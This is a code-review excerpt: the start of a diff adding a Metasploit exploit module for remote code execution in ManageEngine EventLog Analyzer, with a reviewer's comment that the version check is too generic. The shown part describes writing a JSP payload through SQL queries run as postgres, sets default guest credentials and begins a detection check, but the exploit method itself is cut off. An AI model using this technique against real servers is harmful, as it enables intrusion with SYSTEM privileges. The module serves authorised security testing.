modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb

```diff
@@ -0,0 +1,219 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine EventLog Analyzer Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a SQL query functionality in ManageEngine EventLog Analyzer.
+        Every authenticated user, including the default "guest" account can execute SQL queries directly
+        on the underlaying Postres database server. The queries are executed as the "postgres" user
+        which has full privileges and thus is able to write files to disk. This way a JSP payload
+        can be uploaded and executed with SYSTEM privileges on the web server.
+       },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '38173' ],
+        ],
+      'Platform'       => ['win'],
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          ['ManageEngine EventLog Analyzer', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Jul 11 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8400),
+          OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]),
+          OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ]),
+          OptInt.new('WAIT', [true, 'Seconds to wait for execution of the payload', 5]),
+        ], self.class)
+ end
+
+  def uri
+    return target_uri.path
+  end
+
+
+  def check
+    # Check version
+    vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "event", "index3.do")
+    })
+
+    if res && res.code == 200 && res.body =~ /ManageEngine EventLog Analyzer/
```

Comment:
Is there any particular version string returned in the response? This response is too generic and will trigger Detected on all versions of the ManageEngine Event Analyzer.